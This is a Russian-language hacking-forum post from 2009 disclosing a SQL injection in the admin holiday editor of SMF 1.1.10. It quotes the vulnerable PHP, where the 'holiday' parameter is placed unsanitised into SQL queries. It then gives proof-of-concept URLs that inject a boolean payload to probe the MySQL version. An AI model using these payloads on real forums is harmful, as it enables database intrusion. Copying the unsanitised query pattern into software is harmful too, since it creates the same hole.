|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
SMF 1.1.10
АВТОР: HAXTA4OK
нужны права админа 
Код:
function EditHoliday()
{
global $txt, $context, $db_prefix, $scripturl;
loadTemplate('ManageCalendar');
$context['is_new'] = !isset($_REQUEST['holiday']);
$context['page_title'] = $context['is_new'] ? $txt['holidays_add'] : $txt['holidays_edit'];
$context['sub_template'] = 'edit_holiday';
$context['admin_tabs']['tabs']['holidays']['is_selected'] = true;
// Submitting?
if (isset($_POST['sc']) && (isset($_REQUEST['delete']) || $_REQUEST['title'] != ''))
{
checkSession();
if (isset($_REQUEST['delete']))
db_query("
DELETE FROM {$db_prefix}calendar_holidays
WHERE ID_HOLIDAY = $_REQUEST[holiday]", __FILE__, __LINE__);
else
{
$date = strftime($_REQUEST['year'] <= 4 ? '0004-%m-%d' : '%Y-%m-%d', mktime(0, 0, 0, $_REQUEST['month'], $_REQUEST['day'], $_REQUEST['year']));
if (isset($_REQUEST['edit']))
db_query("
UPDATE {$db_prefix}calendar_holidays
SET eventDate = '$date', title = '$_REQUEST[title]'
WHERE ID_HOLIDAY = $_REQUEST[holiday]", __FILE__, __LINE__);
else
db_query("
INSERT INTO {$db_prefix}calendar_holidays
(eventDate, title)
VALUES
('$date', SUBSTRING('$_REQUEST[title]', 1, 48))", __FILE__, __LINE__);
}
updateStats('calendar');
redirectexit('action=managecalendar;sa=holidays');
}
// Default states...
if ($context['is_new'])
$context['holiday'] = array(
'id' => 0,
'day' => date('d'),
'month' => date('m'),
'year' => '0000',
'title' => ''
);
// If it's not new load the data.
else
{
$request = db_query("
SELECT ID_HOLIDAY, YEAR(eventDate) AS year, MONTH(eventDate) AS month, DAYOFMONTH(eventDate) AS day, title
FROM {$db_prefix}calendar_holidays
WHERE ID_HOLIDAY = $_REQUEST[holiday]
LIMIT 1", __FILE__, __LINE__);
while ($row = mysql_fetch_assoc($request))
$context['holiday'] = array(
'id' => $row['ID_HOLIDAY'],
'day' => $row['day'],
'month' => $row['month'],
'year' => $row['year'] <= 4 ? 0 : $row['year'],
'title' => $row['title']
);
mysql_free_result($request);
}
// Last day for the drop down?
$context['holiday']['last_day'] = (int) strftime('%d', mktime(0, 0, 0, $context['holiday']['month'] == 12 ? 1 : $context['holiday']['month'] + 1, 0, $context['holiday']['month'] == 12 ? $context['holiday']['year'] + 1 : $context['holiday']['year']));
}
уязвимое место holiday
=) собственно сам пример
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5
реализация:
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5'
узнаем кол-во колонок - их 5
из постов GREY'a делаем запрос
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;hol iday=5+and+(%23)%0Asubstring(version(),1,1)=5
у меня 5 ветка
P.S. прошу сина не гнать на меня , мой первый баг найденный в SMF
Последний раз редактировалось HAXTA4OK; 23.08.2009 в 18:58..
|